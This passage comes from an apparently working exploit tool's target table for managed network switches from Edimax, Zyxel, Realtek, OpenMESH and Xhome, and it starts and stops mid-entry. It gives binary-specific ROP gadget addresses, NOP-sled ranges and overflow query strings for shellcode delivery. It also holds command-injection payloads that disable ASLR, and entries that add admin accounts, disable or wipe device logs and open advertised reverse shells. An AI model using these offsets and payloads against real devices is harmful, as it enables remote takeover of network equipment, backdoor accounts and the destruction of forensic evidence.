/sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()\r\n\t\t\t\t\t\t'START':0x7ffeff04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 77,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\t\t\t'225-96283': {\r\n\t\t\t\t'template':'Edimax',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'model':'GS-5424PLC',\r\n\t\t\t\t'uri':'https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/smb_switches_poe/gs-5424plc',\r\n\t\t\t\t'version':'1.1.1.6',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E6DC,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998524,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x248411ac,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; 
cgi_diag_traceroute_set()\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t'web_sys_ping_post':0x40E024,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&srvHost=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()\r\n\t\t\t\t\t\t'log_settings_set':0x41D9EC,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_ramClear':0x41D934,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_fileClear':0x41D934,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x416254,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x416254,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x416254,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t\t# /sqfs/home/web/cgi/set.cgi; 
cgi_home_loginAuth_set()\r\n\t\t\t\t\t\t'START':0x7ffeff04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 77,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Zyxel\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : No\r\n\t\t\t# Del /mntlog/flash.log : No\r\n\t\t\t# Add credentials : Yes (adding username to next free index number, may not be #1)\r\n\t\t\t# Del credentials : Yes (index number instead of username, may not be #1)\r\n\t\t\t#\r\n\t\t\t'222-71560': {\r\n\t\t\t\t'template':'Zyxel',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'2.40_AAHL.1_20180705',\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'GS1900-24',\t\t\t\t# Model\r\n\t\t\t\t'uri':'https://www.zyxel.com/products_services/8-10-16-24-48-port-GbE-Smart-Managed-Switch-GS1900-Series/',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40D60C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998520,\t\t\t# la $t9, system) # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x2484e148,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 
7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\t\t\t\t# Not vulnerable\r\n\t\t\t\t\t\t'address':0x4341C4,\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_localUser_post()\r\n\t\t\t\t\t\t'address':0x436D9C,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&usrName=USERNAME&usrPrivType=15&usrPriv=15',\t\t\t# Admin, priv 15\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_localUserDel_post()\r\n\t\t\t\t\t\t'address':0x437124,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&_del=1',\t\t\t# First additional user in the list\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# user\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_setting_post()\r\n\t\t\t\t\t\t'log_settings_set':0x47D760,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_delete_post()\r\n\t\t\t\t\t\t'log_ramClear':0x480804,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_delete_post()\r\n\t\t\t\t\t\t'log_fileClear':0x480804,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x43BA8C,\t# Jump one after 
'sw $ra'\t\t\t# Set SNTP Server (Inject CMD)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x43BA8C,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x43AF54,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable':False,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'dispatcher.cgi',\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()\r\n\t\t\t\t\t\t'query':'username='+ self.random_string(100) +'_RA_START&password='+ self.random_string(59) +'&STARTUP_BACKUP=1'+ (('&' + struct.pack('>L',0x2404FF3D) + struct.pack('>L',0x2404FFFF)) * 70) + '&' + struct.pack('>L',0x2404FF3D) +'_SHELLCODE',\r\n\t\t\t\t\t\t'START':0x10010104,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP': 0x104006A0,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 25,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 15,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':False,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Realtek\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : No\r\n\t\t\t# Del /mntlog/flash.log : No\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'222-40570': {\r\n\t\t\t\t'template':'Realtek',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'3.0.0.43126',\t\t\t\t# Version / binary dependent 
stuff\r\n\t\t\t\t'model':'RTL8380-24GE-4GEC',\t\t\t# Model\r\n\t\t\t\t'uri':'https://www.realtek.com/en/products/communications-network-ics/item/rtl8381m-vb-cg-2',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E6DC,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system) # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x24841ea8,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t# Ping IPv4\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&count=1',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/pingtest_tmp',\r\n\t\t\t\t\t\t'web_sys_ping_post':0x422980,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_ping_post()\r\n\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t#'web_sys_ping_post':0x423168,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_trace_route_post()\r\n\t\t\t\t\t\t#'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/traceroute_tmp #&tr_maxhop=30&count=1',\r\n\t\t\t\t\t\t#'verify_uri':'/tmp/traceroute_tmp',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; 
web_log_setting_post()\r\n\t\t\t\t\t\t'log_settings_set':0x481968,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_ramClear':0x4847DC,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_fileClear':0x4847DC,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x42C8F0,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject CMD)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x42C8F0,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x42C8F0,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'dispatcher.cgi',\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()\r\n\t\t\t\t\t\t'query':'username=_USRNOP&password=_PWDNOP_RA_START&login=1&_USRNOP_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t'START':0x7fff7004,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 28,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 20,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in 
memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# OpenMESH (some identical with enginius egs series)\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'13984-12788': {\r\n\t\t\t\t'template':'OpenMESH',\t\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'01.03.24_180823-1626',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'OMS24',\t\t\t\t# Model\r\n\t\t\t\t'uri':'https://www.openmesh.com/',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E12C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x248405a0,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_acctAdd_set()\r\n\t\t\t\t\t\t'address':0x424890,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pw=PASSWORD&pv=0&op=1&',\t\t\t# Admin, priv 15\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; 
sn_user_mngSet()\r\n\t\t\t\t\t\t'address':0x424890,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pw=&pv=0&op=0',\t\t# \r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# user\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_ipv4PingSet()\r\n\t\t\t\t\t\t#'web_sys_ping_post':0x42341C,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_tracertSet()\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space #&mh=30&uid=0',\r\n\t\t\t\t\t\t'sys_ping_post_check':'&ip=127.0.0.1 ; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',\r\n\t\t\t\t\t\t'verify_uri':'/conf_tmp/check',\r\n\t\t\t\t\t\t'web_sys_ping_post': 0x424248,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()\r\n\t\t\t\t\t\t'log_settings_set':0x43EA88,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_ramClear':0x440660,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_fileClear':0x440660,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x425260,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# 
/sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x425260,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x425260,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'security.cgi',\t\t\t# /sqfs/home/web/cgi-bin/security.cgi; main()\r\n\t\t\t\t\t\t'START':0x100181A0,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x104006A0,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 987,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 69,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':False,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Xhome (identical with Realtek)\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : No\r\n\t\t\t# Del /mntlog/flash.log : No\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'222-64895': {\r\n\t\t\t\t'template':'Xhome',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'3.0.0.43126',\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'DownLoop-G24M',\t\t\t# Model\r\n\t\t\t\t'uri':'http://www.xhome.com.tw/product_info.php?info=p116_XHome-DownLoop-G24M----------------------------------------.html',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() 
\r\n\t\t\t\t\t\t'gadget': 0x40E6DC,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system) # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x24841ea8,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t# Ping IPv4\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&count=1',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/pingtest_tmp',\r\n\t\t\t\t\t\t'web_sys_ping_post':0x4229A0,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_ping_post()\r\n\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t#'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/traceroute_tmp #&tr_maxhop=30&count=1',\r\n\t\t\t\t\t\t#'verify_uri':'/tmp/traceroute_tmp',\r\n\t\t\t\t\t\t#'web_sys_ping_post':0x423188,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_trace_route_post()\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_setting_post()\r\n\t\t\t\t\t\t'log_settings_set':0x481988,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_ramClear':0x4847FC,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log 
